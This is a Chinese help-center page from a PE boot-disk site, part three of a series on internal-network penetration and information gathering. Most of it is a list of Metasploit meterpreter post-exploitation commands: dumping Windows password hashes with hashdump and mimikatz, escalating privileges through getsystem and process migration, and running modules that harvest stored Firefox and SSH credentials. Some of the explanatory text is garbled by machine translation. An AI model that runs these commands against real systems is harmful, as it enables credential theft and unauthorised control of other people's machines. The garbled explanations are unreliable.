U盘PE| w764位旗舰版下载 | U盘装win7系统 | U盘启动 |win7pe | win10下载 |加入收藏土豆PE官网U盘PE,U盘装win7系统,win7pe,U盘启动,U盘装系统,w764位旗舰版下载站!
当前位置:主页 > 帮助中心 > 帮助中心 >

内网渗透之内网信息收集(三)

来源:http://www.tudoupe.com时间:2022-07-05

目录

调用内部网络信息收集

07口令破解

普通用户提权

08other

调用内部网络信息收集

卡利袭击者

目标胜利7

07口令破解

use post/windows/gather/hashdump //system permissions meterpreter

set session 1

exploit // 在tmp目录中存储的结果

use post/windows/gather/smart_hashdump

set session 1

exploit

格式

用户名:RID:LM-HASH值:NT-HASH值

rid是一个与窗口系统帐户相符的固定值,类似于Linux uid,gid号,为管理员500元,501 为客人。又叫,又叫,它们都加密到用户密码上,只不过加密方式不同

hashdump使用了一些模仿函数

load mimikatz

wdigest、kerberos、msv、ssp、tspkg、livessp

mimikatz_command -h

mimikatz_command -f a: // 要查询哪些模块

mimikatz_command -f samdump::hashes

mimikatz_command -f samdump::bootkey

普通用户提权

getuid

查看用户权限

hashdump

需要管理员的权限

getsystem

只是它表面上拥有管理权,却没有真正的管理权

ps

查看进程

getpid

查看当前进程

migrate

进程转移(将普通用户进程转移到管理员用户进程)

hashdump

08other

确定目标主机是否是一个虚拟主机:

run checkvm

获取目标主机上的软件安装信息:

run post/windows/gather/enum_applications

获取最近访问的文件和链接目标主机的信息:

run post/windows/gather/dumplinks

查看目标环境信息:

run post/windows/gather/env

查看在Firefox中存储的帐户密码:

run post/windows/gather/firefox_creds

查看ssh帐户密码的秘密消息和证书信息:

run post/windows/gather/ssh_creds

Copyright © 2012-2014 Www.tudoupe.Com. 土豆启动 版权所有 意见建议:tdsky@tudoupe.com

土豆系统,土豆PE,win7系统下载,win7 64位旗舰版下载,u盘启动,u盘装系统,win10下载,win10正式版下载,win10 RTM正式版下载,win8下载,电脑蓝屏,IE11修复,网络受限,4K对齐,双系统,隐藏分区,系统安装不了,U盘装系统,笔记本装系统,台式机装系统,diskgenius运用,GHSOT装系统,U盘修复,U盘技巧,U盘速度,U盘不能格式化,U盘复制发生错误,U盘加密,U盘选购,开机黑屏,蓝屏,进不了系统,上不了网,打不开程序,点击无反应,系统设置,PE个性化,PE添加网络,PE维护系统

点击这里给我发消息